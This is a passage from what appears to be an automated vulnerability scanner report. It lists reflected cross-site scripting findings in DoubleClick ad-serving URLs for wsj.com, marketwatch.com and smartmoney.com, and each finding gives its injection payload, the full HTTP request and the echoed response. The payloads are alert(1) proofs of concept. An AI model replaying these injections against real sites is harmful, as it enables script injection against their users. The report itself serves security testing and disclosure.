Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:38:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 575

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/y;218880928;0-0;1;49299998;28945-571/208;36054130/36072016/1;;~okv=;!category=;page=article;;mc=b2pfreezone_super;tile=2;sz=571x208;&d6da8"style="x:expression(alert(1))"491de8a7ea7=1;~aopt=2/1/ff/1;~sscs=%3fhttp://commerce.wsj.com/auth/login?roles=FREEREG-BASE&amp;reg-track-code=ss3_0310">
...[SNIP]...

4.18. http://ad.doubleclick.net/adi/interactive.wsj.com/rej_front_tilebot [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/rej_front_tilebot

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9678b"style%3d"x%3aexpression(alert(1))"93b4aee328e was submitted in the !category parameter. This input was echoed as 9678b"style="x:expression(alert(1))"93b4aee328e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/rej_front_tilebot;!category=;msrc=WSJ_topnav_realestate_main;s=8_10001;mc=b2pfreezone;pos=3;tile=5;sz=120x90;ord=5003500350035003;9678b"style%3d"x%3aexpression(alert(1))"93b4aee328e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-real-estate-homes.html?mod=WSJ_topnav_realestate_main
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:40:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 525

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/m;237012713;0-0;1;60333544;2-120/90;40909831/40927618/1;;~okv=;!category=;msrc=WSJ_topnav_realestate_main;s=8_10001;mc=b2pfreezone;pos=3;tile=5;sz=120x90;9678b"style="x:expression(alert(1))"93b4aee328e;~aopt=2/1/ff/1;~sscs=%3fhttp://www.Brownharrisstevens.com">
...[SNIP]...

4.19. http://ad.doubleclick.net/adi/interactive.wsj.com/rej_front_tilebot [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/rej_front_tilebot

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b79d6"style%3d"x%3aexpression(alert(1))"80c502dadb5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b79d6"style="x:expression(alert(1))"80c502dadb5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/rej_front_tilebot;!category=;msrc=WSJ_topnav_realestate_main;s=8_10001;mc=b2pfreezone;pos=3;tile=5;sz=120x90;ord=5003500350035003;&b79d6"style%3d"x%3aexpression(alert(1))"80c502dadb5=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-real-estate-homes.html?mod=WSJ_topnav_realestate_main
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:41:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 528

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/m;237012713;0-0;1;60333544;2-120/90;40909831/40927618/1;;~okv=;!category=;msrc=WSJ_topnav_realestate_main;s=8_10001;mc=b2pfreezone;pos=3;tile=5;sz=120x90;&b79d6"style="x:expression(alert(1))"80c502dadb5=1;~aopt=2/1/ff/1;~sscs=%3fhttp://www.Brownharrisstevens.com">
...[SNIP]...

4.20. http://ad.doubleclick.net/adi/interactive.wsj.com/rej_front_tiletop [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/rej_front_tiletop

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d3e6"style%3d"x%3aexpression(alert(1))"c9e8184e84a was submitted in the !category parameter. This input was echoed as 3d3e6"style="x:expression(alert(1))"c9e8184e84a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/rej_front_tiletop;!category=;msrc=WSJ_topnav_realestate_main;s=8_10001;mc=b2pfreezone;pos=1;tile=3;sz=120x90;ord=5003500350035003;3d3e6"style%3d"x%3aexpression(alert(1))"c9e8184e84a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-real-estate-homes.html?mod=WSJ_topnav_realestate_main
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:40:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 536

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/q;237007724;0-0;1;60333542;2-120/90;40888842/40906629/1;;~okv=;!category=;msrc=WSJ_topnav_realestate_main;s=8_10001;mc=b2pfreezone;pos=1;tile=3;sz=120x90;3d3e6"style="x:expression(alert(1))"c9e8184e84a;~aopt=2/1/ff/1;~sscs=%3fhttp://www.theremaxcollection.com">
...[SNIP]...

4.21. http://ad.doubleclick.net/adi/interactive.wsj.com/rej_front_tiletop [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/rej_front_tiletop

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 927aa"style%3d"x%3aexpression(alert(1))"8dafbc3225b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 927aa"style="x:expression(alert(1))"8dafbc3225b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/rej_front_tiletop;!category=;msrc=WSJ_topnav_realestate_main;s=8_10001;mc=b2pfreezone;pos=1;tile=3;sz=120x90;ord=5003500350035003;&927aa"style%3d"x%3aexpression(alert(1))"8dafbc3225b=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-real-estate-homes.html?mod=WSJ_topnav_realestate_main
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:41:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 539

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/q;237007724;0-0;1;60333542;2-120/90;40888842/40906629/1;;~okv=;!category=;msrc=WSJ_topnav_realestate_main;s=8_10001;mc=b2pfreezone;pos=1;tile=3;sz=120x90;&927aa"style="x:expression(alert(1))"8dafbc3225b=1;~aopt=2/1/ff/1;~sscs=%3fhttp://www.theremaxcollection.com">
...[SNIP]...

4.22. http://ad.doubleclick.net/adi/marketwatch.com/brand_channel [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/marketwatch.com/brand_channel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbaa5"style%3d"x%3aexpression(alert(1))"be227d3384 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dbaa5"style="x:expression(alert(1))"be227d3384 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/marketwatch.com/brand_channel;u=%5e%5e;sz=377x140;tile=8;ord=1820011674?&dbaa5"style%3d"x%3aexpression(alert(1))"be227d3384=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:17:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 603

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/q;216938922;0-0;0;39274004;29332-377/140;42148535/42166322/1;u=^^;~okv=;u=^^;sz=377x140;tile=8;;dbaa5"style="x:expression(alert(1))"be227d3384=1;~aopt=6/1/ff/1;~sscs=%3fhttp://www.marketwatch.com/investing-insights?reflink=djm_hamwinvestinginsightsevent1">
...[SNIP]...

4.23. http://ad.doubleclick.net/adi/marketwatch.com/brand_channel [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/marketwatch.com/brand_channel

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 879f8'-alert(1)-'937c450e926 was submitted in the u parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/marketwatch.com/brand_channel;u=879f8'-alert(1)-'937c450e926 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 52362
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:16:48 GMT
Expires: Sat, 14 May 2011 10:16:48 GMT

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects)
...[SNIP]...
ttp://ad.doubleclick.net/activity;src=1363789;stragg=1;v=1;pid=39274004;aid=240691320;ko=0;cid=41978572;rid=41996359;rv=1;rn=3294807;";
this.swfParams = 'src=1363789&rv=1&rid=41996359&=879f8'-alert(1)-'937c450e926&';
this.renderingId = "41996359";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsMode" == "true")
...[SNIP]...

4.24. http://ad.doubleclick.net/adi/marketwatch.com/frontpage [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/marketwatch.com/frontpage

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2c2f"style%3d"x%3aexpression(alert(1))"028110bafbf was submitted in the u parameter. This input was echoed as b2c2f"style="x:expression(alert(1))"028110bafbf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/marketwatch.com/frontpage;u=b2c2f"style%3d"x%3aexpression(alert(1))"028110bafbf HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 632
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:16:19 GMT
Expires: Sat, 14 May 2011 10:16:19 GMT

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/f;225017382;0-0;0;13112443;255-0/0;36796821/36814699/1;u=b2c2f"style="x:expression(alert(1))"028110bafbf;~okv=;u=b2c2f"style="x:expression(alert(1))"028110bafbf;~aopt=2/1/ff/1;~sscs=%3fhttp://store.marketwatch.com/webapp/wcs/stores/servlet/PremiumNewsletters_WhatIsWorkingNow?dist=IAEHM1AFW">
...[SNIP]...

4.25. http://ad.doubleclick.net/adi/marketwatch.com/mutualfunds_jaffe [mc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/marketwatch.com/mutualfunds_jaffe

Issue detail

The value of the mc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload decdc"style%3d"x%3aexpression(alert(1))"1f315fea566 was submitted in the mc parameter. This input was echoed as decdc"style="x:expression(alert(1))"1f315fea566 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/marketwatch.com/mutualfunds_jaffe;mc=decdc"style%3d"x%3aexpression(alert(1))"1f315fea566 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13?link=MW_story_investinginsightb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 584
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:31:34 GMT
Expires: Sat, 14 May 2011 10:31:34 GMT

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/m;225017382;0-0;0;13314513;255-0/0;36796821/36814699/1;;~okv=;mc=decdc"style="x:expression(alert(1))"1f315fea566;~aopt=2/1/ff/1;~sscs=%3fhttp://store.marketwatch.com/webapp/wcs/stores/servlet/PremiumNewsletters_WhatIsWorkingNow?dist=IAEHM1AFW">
...[SNIP]...

4.26. http://ad.doubleclick.net/adi/marketwatch.com/mutualfunds_jaffe [mc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/marketwatch.com/mutualfunds_jaffe

Issue detail

The value of the mc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e76f1'-alert(1)-'733e9c42067 was submitted in the mc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/marketwatch.com/mutualfunds_jaffe;mc=e76f1'-alert(1)-'733e9c42067 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13?link=MW_story_investinginsightb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 52206
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:31:55 GMT
Expires: Sat, 14 May 2011 10:31:55 GMT

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects)
...[SNIP]...
ttp://ad.doubleclick.net/activity;src=1363789;stragg=1;v=1;pid=13314513;aid=240691320;ko=0;cid=41978572;rid=41996359;rv=1;rn=4201822;";
this.swfParams = 'src=1363789&rv=1&rid=41996359&=e76f1'-alert(1)-'733e9c42067&';
this.renderingId = "41996359";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsMode" == "true")
...[SNIP]...

4.27. http://ad.doubleclick.net/adi/marketwatch.com/mutualfunds_jaffe [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/marketwatch.com/mutualfunds_jaffe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2282"style%3d"x%3aexpression(alert(1))"6fb2e5162b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b2282"style="x:expression(alert(1))"6fb2e5162b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/marketwatch.com/mutualfunds_jaffe;mc=MWRetWeek;s=8_10001;u=%5e%5elA;biz=1053;sz=377x100;tile=2;ord=1531063701?&b2282"style%3d"x%3aexpression(alert(1))"6fb2e5162b9=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13?link=MW_story_investinginsightb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:32:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 640

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/f;220450143;0-0;1;13314513;34555-377/100;34659507/34677385/1;u=^^lA;~okv=;mc=MWRetWeek;s=8_10001;u=^^lA;biz=1053;sz=377x100;tile=2;;b2282"style="x:expression(alert(1))"6fb2e5162b9=1;~aopt=2/1/ff/1;~sscs=%3fhttp://store.marketwatch.com/webapp/wcs/stores/servlet/PremiumNewsletters_RetirementWeekly?dist=IYMLMST1R">
...[SNIP]...

4.28. http://ad.doubleclick.net/adi/smartmoney.com/Homepage_Main_Front [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/smartmoney.com/Homepage_Main_Front

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a590"style%3d"x%3aexpression(alert(1))"3f35620f0d0 was submitted in the !category parameter. This input was echoed as 3a590"style="x:expression(alert(1))"3f35620f0d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/smartmoney.com/Homepage_Main_Front;!category=;page=magsubscribe;;mc=0;tile=5;sz=378x115;ord=5424542454245424;3a590"style%3d"x%3aexpression(alert(1))"3f35620f0d0 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/?zone=intromessage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:19:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 573

<head><title>Click here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/a;241002750;0-0;0;62167023;41664-378/115;42067942/42085729/1;;~okv=;!category=;page=magsubscribe;;mc=0;tile=5;sz=378x115;3a590"style="x:expression(alert(1))"3f35620f0d0;~aopt=2/1/ff/1;~sscs=%3fhttps://w1.buysub.com/servlet/OrdersGateway?cds_mag_code=SMY&cds_page_id=66975&cds_response_key=IDLGODAB">
...[SNIP]...

4.29. http://ad.doubleclick.net/adi/smartmoney.com/Homepage_Main_Front [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/smartmoney.com/Homepage_Main_Front

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e208"style%3d"x%3aexpression(alert(1))"53d8c16d7c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9e208"style="x:expression(alert(1))"53d8c16d7c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/smartmoney.com/Homepage_Main_Front;!category=;page=magsubscribe;;mc=0;tile=5;sz=378x115;ord=5424542454245424;&9e208"style%3d"x%3aexpression(alert(1))"53d8c16d7c2=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/?zone=intromessage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:20:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 576

<head><title>Click here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/a;241002750;0-0;0;62167023;41664-378/115;42067942/42085729/1;;~okv=;!category=;page=magsubscribe;;mc=0;tile=5;sz=378x115;&9e208"style="x:expression(alert(1))"53d8c16d7c2=1;~aopt=2/1/ff/1;~sscs=%3fhttps://w1.buysub.com/servlet/OrdersGateway?cds_mag_code=SMY&cds_page_id=66975&cds_response_key=IDLGODAB">
...[SNIP]...

4.30. http://ad.doubleclick.net/adi/smartmoney.com/SmartMoney_Main_Front [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/smartmoney.com/SmartMoney_Main_Front

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc80e"style%3d"x%3aexpression(alert(1))"6c0363045c7 was submitted in the !category parameter. This input was echoed as dc80e"style="x:expression(alert(1))"6c0363045c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/smartmoney.com/SmartMoney_Main_Front;!category=;page=smcirc;;mc=0;tile=4;sz=377x140;ord=2886288628862886;dc80e"style%3d"x%3aexpression(alert(1))"6c0363045c7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
